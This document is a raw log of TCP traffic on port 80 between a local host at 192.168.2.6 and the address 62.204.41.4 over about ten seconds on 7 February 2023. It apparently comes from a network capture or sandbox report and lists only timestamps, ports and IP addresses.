Feb 7, 2023 20:01:46.349632978 CET	49922	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.351418018 CET	49923	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.410224915 CET	80	49922	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.410439014 CET	49922	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.412846088 CET	80	49923	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.413083076 CET	49923	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.547163010 CET	49923	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.608689070 CET	80	49923	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.611893892 CET	80	49923	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.612129927 CET	49923	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.778186083 CET	49923	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.787079096 CET	49924	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.839852095 CET	80	49923	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.840074062 CET	49923	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.849529982 CET	80	49924	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.849771023 CET	49924	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.876099110 CET	49924	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:46.938584089 CET	80	49924	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.940932989 CET	80	49924	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:46.941143990 CET	49924	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:47.099761009 CET	49924	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:47.100923061 CET	49925	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:47.162336111 CET	80	49924	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:47.162364006 CET	80	49925	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:47.162555933 CET	49924	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:47.162610054 CET	49925	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:47.192101002 CET	49925	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:47.253878117 CET	80	49925	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:47.257828951 CET	80	49925	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:47.258023977 CET	49925	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.290394068 CET	49925	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.291382074 CET	49926	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.353840113 CET	80	49925	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.354016066 CET	49925	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.354803085 CET	80	49926	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.354981899 CET	49926	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.382339954 CET	49926	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.444626093 CET	80	49926	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.448029041 CET	80	49926	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.448216915 CET	49926	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.592365026 CET	49926	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.593611956 CET	49927	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.654757977 CET	80	49926	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.654887915 CET	49926	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.654922962 CET	80	49927	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.655020952 CET	49927	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.659609079 CET	49927	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.721052885 CET	80	49927	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.723993063 CET	80	49927	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.724128008 CET	49927	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.829459906 CET	49927	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.830470085 CET	49928	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.891868114 CET	80	49928	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.891999960 CET	80	49927	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.892038107 CET	49928	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.892079115 CET	49927	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.894594908 CET	49928	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:49.954881907 CET	80	49928	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.957206964 CET	80	49928	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:49.957370043 CET	49928	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.068773031 CET	49928	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.069849014 CET	49929	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.129224062 CET	80	49928	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.129365921 CET	49928	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.132771969 CET	80	49929	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.132977009 CET	49929	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.134881973 CET	49929	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.196410894 CET	80	49929	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.201193094 CET	80	49929	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.201564074 CET	49929	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.312321901 CET	49929	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.313452005 CET	49930	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.373008013 CET	80	49930	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.373150110 CET	49930	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.373765945 CET	80	49929	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.373847961 CET	49929	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.374172926 CET	49930	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.434653997 CET	80	49930	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.436979055 CET	80	49930	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.437081099 CET	49930	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.547549009 CET	49930	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.548715115 CET	49931	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.607203007 CET	80	49930	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.607397079 CET	49930	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.611489058 CET	80	49931	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.611638069 CET	49931	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.612148046 CET	49931	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.674762964 CET	80	49931	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.677005053 CET	80	49931	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.677180052 CET	49931	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.800331116 CET	49931	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.801222086 CET	49932	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.860451937 CET	80	49932	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.860682011 CET	49932	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.862632036 CET	49932	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.863384008 CET	80	49931	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.863528967 CET	49931	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:50.922038078 CET	80	49932	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.924379110 CET	80	49932	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:50.924542904 CET	49932	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.030761957 CET	49932	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.031996012 CET	49933	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.090965986 CET	80	49932	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.093389988 CET	80	49933	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.093561888 CET	49932	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.094137907 CET	49933	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.094137907 CET	49933	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.154616117 CET	80	49933	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.158330917 CET	80	49933	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.158430099 CET	49933	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.265394926 CET	49934	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.265727997 CET	49933	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.326241016 CET	80	49933	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.327928066 CET	80	49934	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.328195095 CET	49934	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.328468084 CET	49933	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.338963032 CET	49934	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.401392937 CET	80	49934	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.403808117 CET	80	49934	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.404078007 CET	49934	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.515799046 CET	49934	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.517071962 CET	49935	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.578141928 CET	80	49935	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.578296900 CET	80	49934	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.578600883 CET	49935	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.578600883 CET	49934	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.579499960 CET	49935	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.639905930 CET	80	49935	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.642149925 CET	80	49935	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.643695116 CET	49935	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.757858038 CET	49935	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.758457899 CET	49936	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.818552017 CET	80	49935	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.818747044 CET	49935	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.819698095 CET	80	49936	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.819817066 CET	49936	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.820245981 CET	49936	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.881675959 CET	80	49936	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.883994102 CET	80	49936	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:51.884115934 CET	49936	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:51.999429941 CET	49936	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.000720978 CET	49937	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.061049938 CET	80	49936	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.061167002 CET	80	49937	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.061326981 CET	49937	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.061330080 CET	49936	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.063127041 CET	49937	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.123703957 CET	80	49937	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.127693892 CET	80	49937	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.127966881 CET	49937	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.239137888 CET	49937	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.240216970 CET	49938	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.299901009 CET	80	49937	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.300163031 CET	49937	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.303813934 CET	80	49938	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.304091930 CET	49938	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.305588007 CET	49938	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.368098021 CET	80	49938	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.370268106 CET	80	49938	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.370434046 CET	49938	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.483648062 CET	49938	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.484724998 CET	49939	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.545207977 CET	80	49939	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.545371056 CET	49939	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.546117067 CET	49939	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.546176910 CET	80	49938	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.546295881 CET	49938	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.606430054 CET	80	49939	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.609177113 CET	80	49939	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.609421968 CET	49939	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.719120979 CET	49939	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.720432043 CET	49940	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.779685974 CET	80	49939	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.779881001 CET	49939	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.780899048 CET	80	49940	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.781079054 CET	49940	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.794804096 CET	49940	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.855431080 CET	80	49940	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.857938051 CET	80	49940	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:52.858124018 CET	49940	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.970439911 CET	49940	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:52.971609116 CET	49941	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.031079054 CET	80	49940	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.031905890 CET	49940	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.033257008 CET	80	49941	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.033389091 CET	49941	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.041039944 CET	49941	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.102773905 CET	80	49941	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.106280088 CET	80	49941	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.106482029 CET	49941	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.223215103 CET	49941	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.224176884 CET	49942	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.285069942 CET	80	49941	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.285334110 CET	49941	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.286664009 CET	80	49942	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.287894011 CET	49942	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.287894011 CET	49942	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.350487947 CET	80	49942	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.352664948 CET	80	49942	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.352747917 CET	49942	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.470928907 CET	49942	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.471781015 CET	49943	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.532181025 CET	80	49943	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.532305956 CET	49943	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.532964945 CET	49943	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.533643007 CET	80	49942	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.533740044 CET	49942	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.593228102 CET	80	49943	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.595475912 CET	80	49943	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.595653057 CET	49943	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.729275942 CET	49943	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.730568886 CET	49944	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.789886951 CET	80	49943	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.790004969 CET	49943	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.791002989 CET	80	49944	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.791152954 CET	49944	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.792361975 CET	49944	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.852797985 CET	80	49944	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.854832888 CET	80	49944	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:53.854948997 CET	49944	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.972160101 CET	49944	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:53.973395109 CET	49945	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.032710075 CET	80	49944	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.035094023 CET	49944	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.035660982 CET	80	49945	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.040174961 CET	49945	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.040738106 CET	49945	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.103387117 CET	80	49945	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.107270002 CET	80	49945	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.107487917 CET	49945	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.220488071 CET	49945	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.221657991 CET	49946	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.283078909 CET	80	49945	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.283157110 CET	80	49946	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.283355951 CET	49945	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.283444881 CET	49946	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.317743063 CET	49946	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.379719973 CET	80	49946	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.382225990 CET	80	49946	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.382338047 CET	49946	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.520009041 CET	49946	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.520912886 CET	49947	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.583626986 CET	80	49946	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.583772898 CET	80	49947	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.583976030 CET	49946	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.584060907 CET	49947	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.584701061 CET	49947	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.647025108 CET	80	49947	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.649368048 CET	80	49947	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.649619102 CET	49947	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.766726017 CET	49947	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.767833948 CET	49948	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.827542067 CET	80	49947	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.829132080 CET	80	49948	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.829334021 CET	49947	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.829482079 CET	49948	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.830001116 CET	49948	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.891277075 CET	80	49948	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.893845081 CET	80	49948	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:54.894090891 CET	49948	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:54.999375105 CET	49948	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.000612020 CET	49949	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.060698986 CET	80	49948	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.060926914 CET	49948	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.062021017 CET	80	49949	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.062206030 CET	49949	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.074451923 CET	49949	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.137103081 CET	80	49949	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.140377045 CET	80	49949	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.140813112 CET	49949	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.250242949 CET	49949	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.251243114 CET	49950	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.310863018 CET	80	49950	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.311104059 CET	49950	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.311995983 CET	80	49949	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.312148094 CET	49949	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.313520908 CET	49950	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.373115063 CET	80	49950	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.375415087 CET	80	49950	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.375586987 CET	49950	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.485743046 CET	49950	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.486757994 CET	49951	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.545445919 CET	80	49950	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.545614004 CET	49950	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.549295902 CET	80	49951	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.549489975 CET	49951	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.550312996 CET	49951	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.612874031 CET	80	49951	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.615092993 CET	80	49951	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.615241051 CET	49951	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.730091095 CET	49951	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.730937958 CET	49952	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.790375948 CET	80	49952	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.790653944 CET	49952	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.791186094 CET	49952	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.792660952 CET	80	49951	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.792773008 CET	49951	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.850470066 CET	80	49952	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.854109049 CET	80	49952	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:55.854247093 CET	49952	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.968916893 CET	49952	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:55.970017910 CET	49953	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.028527021 CET	80	49952	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.028752089 CET	49952	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.031543970 CET	80	49953	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.031714916 CET	49953	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.032155037 CET	49953	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.093753099 CET	80	49953	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.098236084 CET	80	49953	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.098380089 CET	49953	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.203047991 CET	49953	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.204102993 CET	49954	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.263555050 CET	80	49954	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.263900995 CET	49954	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.264684916 CET	80	49953	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.264833927 CET	49953	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.265158892 CET	49954	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.324650049 CET	80	49954	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.327336073 CET	80	49954	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.327498913 CET	49954	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.436805964 CET	49954	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.437952042 CET	49955	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.496287107 CET	80	49954	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.496512890 CET	49954	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.499474049 CET	80	49955	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.499723911 CET	49955	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.500323057 CET	49955	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.561634064 CET	80	49955	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.563816071 CET	80	49955	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.564040899 CET	49955	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.673228979 CET	49955	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.673971891 CET	49956	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.734867096 CET	80	49955	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.735014915 CET	49955	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.736375093 CET	80	49956	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.736530066 CET	49956	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.737292051 CET	49956	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:56.799810886 CET	80	49956	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.802118063 CET	80	49956	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:56.802215099 CET	49956	80	192.168.2.6	62.204.41.4
